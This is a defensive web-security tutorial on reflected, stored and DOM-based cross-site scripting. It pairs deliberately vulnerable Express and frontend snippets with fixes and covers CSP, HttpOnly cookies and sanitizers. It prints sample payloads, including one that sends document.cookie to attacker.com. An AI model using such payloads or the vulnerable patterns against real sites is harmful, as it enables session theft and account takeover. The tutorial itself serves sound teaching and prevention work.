Cross-site scripting is one of those vulnerabilities that keeps showing up because it’s fundamentally simple: untrusted data ends up in a place where the browser treats it as code. But “XSS” isn’t just one thing. In practice, you’ll usually hear about three flavors:
Reflected XSS
Stored XSS
DOM-based XSS
They all end with attacker-controlled JavaScript running in a victim’s browser, but the way the payload gets there matters a lot for both exploitation and prevention.
If you’re trying to secure a real app, understanding the difference is not optional. Teams often say “we escape output” and still miss DOM sinks. Or they deploy a WAF and assume reflected XSS is solved while stored XSS sits in a comment field for months.
This tutorial walks through each type, shows how it happens, and explains what actually fixes it.
Scan your site for XSS vulnerabilities and other security issues at headertest.com - free, instant, no signup required.
The core idea behind all XSS
At a high level, XSS happens when:
- An attacker controls some input.
- That input reaches a browser-executable context.
- The browser interprets it as HTML or JavaScript instead of plain text.
A tiny example says it best. Suppose your app takes a name from the user and renders it directly:
<div>Welcome, {{name}}</div>
If your templating system safely escapes the value, the browser sees text. Good.
But if the app instead outputs raw HTML:
<div>Welcome, <script>alert(1)</script></div>
the browser executes the script. That’s XSS.
The three categories differ in where the malicious input comes from and how it reaches the page.
Reflected XSS
Reflected XSS happens when attacker input is sent in a request and immediately reflected in the response without proper escaping or validation.
This is the classic “click this malicious link” version of XSS.
How it works
Imagine a search page:
GET /search?q=shoes
The server responds with:
<h1>Search results for: shoes</h1>
If the server builds that HTML unsafely, an attacker can craft a URL like:
https://example.com/search?q=<script>alert(1)</script>
If the server inserts q directly into the page, the victim’s browser runs the script when they visit the link.
Vulnerable server example
Here’s a deliberately bad Node/Express example:
app.get('/search', (req, res) => {
const q = req.query.q || '';
res.send(`<h1>Search results for: ${q}</h1>`);
});
Attack payload:
/search?q=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
If cookies aren’t protected with HttpOnly, that’s game over for session theft.
Safer version
The right fix is context-aware escaping. If you are inserting untrusted data into HTML text content, escape it for HTML.
function escapeHtml(str) {
return str
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''');
}
app.get('/search', (req, res) => {
const q = req.query.q || '';
res.send(`<h1>Search results for: ${escapeHtml(q)}</h1>`);
});
Now <script>alert(1)</script> is rendered as text, not executed.
Why reflected XSS is dangerous
People sometimes downplay reflected XSS because it “requires a victim to click a link.” That’s a mistake.
Attackers can deliver payloads through:
- phishing emails
- shortened URLs
- malicious ads
- open redirects
- injected links in trusted forums or chat systems
And reflected XSS often lands on high-value pages like login forms, admin search panels, support dashboards, or payment flows.
Common reflected XSS sinks
You’ll often find reflected XSS when input is inserted into:
- HTML body content
- HTML attributes
- inline JavaScript
- script blocks
- URL attributes like
hrefandsrc
This matters because escaping rules differ by context. HTML escaping alone does not make inline JavaScript safe.
For example, this is still dangerous:
res.send(`<script>var q = '${req.query.q}'</script>`);
If q contains:
';alert(1);//
the resulting script becomes:
<script>var q = '';alert(1);//'</script>
That’s why “just escape some characters” is not a serious XSS strategy.
Stored XSS
Stored XSS happens when attacker input is saved by the application and later served to users. This is usually worse than reflected XSS because the payload persists and can hit many victims automatically.
This is the “plant a payload and wait” version.
How it works
Think about a comment system. A user posts:
<script>alert('pwned')</script>
The app stores the comment in the database. Whenever anyone views the page, the comment is rendered and the script executes.
Unlike reflected XSS, the victim does not need a special link. They just browse to a normal page containing stored attacker content.
Vulnerable example
A basic Express app:
const comments = [];
app.post('/comment', (req, res) => {
comments.push(req.body.text);
res.send('Saved');
});
app.get('/comments', (req, res) => {
const html = comments.map(c => `<li>${c}</li>`).join('');
res.send(`<ul>${html}</ul>`);
});
If an attacker submits:
<img src=x onerror=alert('stored-xss')>
that gets stored and triggers when rendered.
Safer version
Escape when rendering:
app.get('/comments', (req, res) => {
const html = comments.map(c => `<li>${escapeHtml(c)}</li>`).join('');
res.send(`<ul>${html}</ul>`);
});
If your app genuinely supports rich text, don’t roll your own sanitizer. Use a well-maintained HTML sanitizer with a strict allowlist.
For example, allow:
<b><i><p><a>with safehref
And strip:
<script>- event handlers like
onclick - dangerous URLs like
javascript:... - inline styles if you can avoid them
Why stored XSS is usually worse
Stored XSS tends to have broader impact because:
- it affects every viewer of the infected content
- it can target admins and moderators
- it persists until removed
- it’s easier to weaponize for account takeover or internal pivoting
If an attacker can inject stored XSS into an admin panel, they may be able to trigger privileged actions through the admin’s session, read sensitive data shown in the UI, or create new privileged users.
Stored XSS is especially common in:
- comments
- profile fields
- support tickets
- CMS content
- product reviews
- chat messages
- forum posts
- logs displayed in admin dashboards
And yes, log viewers are a real problem. People forget that log entries can contain user-controlled strings.
DOM-based XSS
DOM-based XSS is different because the vulnerability lives in client-side JavaScript rather than in server-rendered HTML. The server might return a perfectly safe page, but frontend code reads attacker-controlled data and writes it into a dangerous DOM sink.
This is where a lot of modern apps still get burned.
How it works
Suppose the frontend reads a value from the URL fragment:
https://example.com/#<img src=x onerror=alert(1)>
And then does this:
const payload = location.hash.substring(1);
document.getElementById('output').innerHTML = payload;
That’s DOM XSS. The browser never sent the fragment to the server. The page’s own JavaScript turned untrusted input into executable HTML.
Vulnerable example
<div id="message"></div>
<script>
const msg = new URLSearchParams(window.location.search).get('msg');
document.getElementById('message').innerHTML = msg;
</script>
Payload:
?msg=<svg onload=alert('dom-xss')>
The script grabs msg and injects it with innerHTML. Browser executes it.
Safer version
Use safe DOM APIs that treat content as text:
<div id="message"></div>
<script>
const msg = new URLSearchParams(window.location.search).get('msg') || '';
document.getElementById('message').textContent = msg;
</script>
Now the payload is displayed literally.
Dangerous DOM sinks
If you work on frontend code, these APIs should immediately make you suspicious:
innerHTMLouterHTMLinsertAdjacentHTMLdocument.writeevalsetTimeout(string)setInterval(string)new Function(...)
Also watch assignments to:
element.srcdoclocationiframe.srcscript.srcwhen attacker-controlled- event handler attributes like
onclick
And don’t assume React, Vue, Angular, or Svelte automatically save you from everything. Framework defaults help a lot, but escape hatches like React’s dangerouslySetInnerHTML exist for a reason: they are dangerous.
Quick comparison
Here’s the practical difference:
Reflected XSS
- Payload comes from the current request
- Usually requires tricking a victim into visiting a crafted URL
- Server reflects the input in the response
Stored XSS
- Payload is saved on the server or backend storage
- Victims are hit when viewing infected content
- Usually broader and more persistent impact
DOM-based XSS
- Payload is processed by client-side JavaScript
- Server response may be static and innocent
- Vulnerability depends on unsafe DOM manipulation
Real-world source to sink thinking
The most useful way to think about XSS isn’t by memorizing names. It’s by tracing data flow:
Sources
Where attacker input comes from:
- query parameters
- POST bodies
- headers
- URL fragments
document.referrerlocalStoragepostMessage- database content
- third-party APIs
Sinks
Where it becomes dangerous:
- HTML injection points
- script execution contexts
- JavaScript-evaluating functions
- URL-based execution paths
- event handler attributes
If untrusted data can move from a source to a sink without proper handling, you likely have XSS.
Prevention that actually works
A lot of XSS advice online is half-true. Here’s the version that matters.
1. Use context-aware output encoding
Escape based on where the data goes:
- HTML text: HTML escape
- HTML attribute: attribute escape
- JavaScript string: JavaScript-safe serialization
- URL: URL encode
- CSS: ideally don’t inject untrusted data there at all
One encoder does not fit every context.
2. Prefer safe DOM APIs
Use:
textContent
setAttribute with validated values
createTextNode
appendChild
Avoid raw HTML injection unless absolutely necessary.
3. Sanitize rich HTML with a real sanitizer
If users can submit formatted content, sanitize with a battle-tested library and a strict allowlist. Do not try to blacklist “bad tags.” That approach fails constantly.
4. Deploy Content Security Policy
CSP is not a replacement for fixing XSS, but it’s an excellent mitigation layer.
A strong CSP can reduce exploitability by blocking inline scripts and restricting where scripts load from.
A decent starting point looks like:
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-random123';
object-src 'none';
base-uri 'self';
frame-ancestors 'none';
Nonces or hashes are much better than allowing 'unsafe-inline'. If your CSP includes 'unsafe-inline', you’ve already weakened it significantly.
5. Set cookie defenses
Use:
Set-Cookie: session=...; HttpOnly; Secure; SameSite=Lax
HttpOnly helps prevent JavaScript from reading cookies, which limits one common XSS impact. It does not stop XSS itself.
6. Avoid inline JavaScript
This pattern is fragile:
<button onclick="doSearch('USER_INPUT')">Go</button>
Use event listeners in separate JS instead.
7. Validate URLs before inserting them
If you let users control links or redirect targets, validate scheme and destination. Reject dangerous schemes like:
javascript:
data:
vbscript:
A common misconception: “We escaped on input”
Don’t rely on input-time escaping as your main defense.
Why? Because the same data may later be used in different contexts:
- shown in HTML
- embedded in JavaScript
- inserted into an attribute
- exported as JSON
Encoding should usually happen at output, for the specific context being rendered. Validation on input is good for enforcing business rules, but it’s not a universal XSS fix.
Testing for each type
A simple mental checklist:
For reflected XSS
Put payloads in:
- query params
- form fields
- headers
Then see whether they come back in the response unsafely.
For stored XSS
Submit payloads into:
- comments
- names
- messages
- ticket fields
- profile fields
Then revisit pages that display the stored data, especially admin views.
For DOM XSS
Inspect frontend code for:
innerHTML- URL parsing
location.hashpostMessage- template rendering from client-side data
Then test if browser-only input can trigger execution without the server reflecting it.
Final takeaway
If you remember one thing, make it this:
- Reflected XSS: payload comes in the request and bounces off the server response.
- Stored XSS: payload gets saved and hits users later.
- DOM-based XSS: frontend JavaScript turns untrusted data into code in the browser.
They’re different delivery mechanisms for the same underlying failure: treating attacker-controlled input as executable content.
The fix is also the same in spirit: never let untrusted data reach dangerous browser contexts without the right protections. Escape for the right context, sanitize when HTML is allowed, use safe DOM APIs, and back it up with CSP.
If your app mixes server rendering, user-generated content, and client-side DOM updates, assume all three XSS types are relevant. Because they usually are.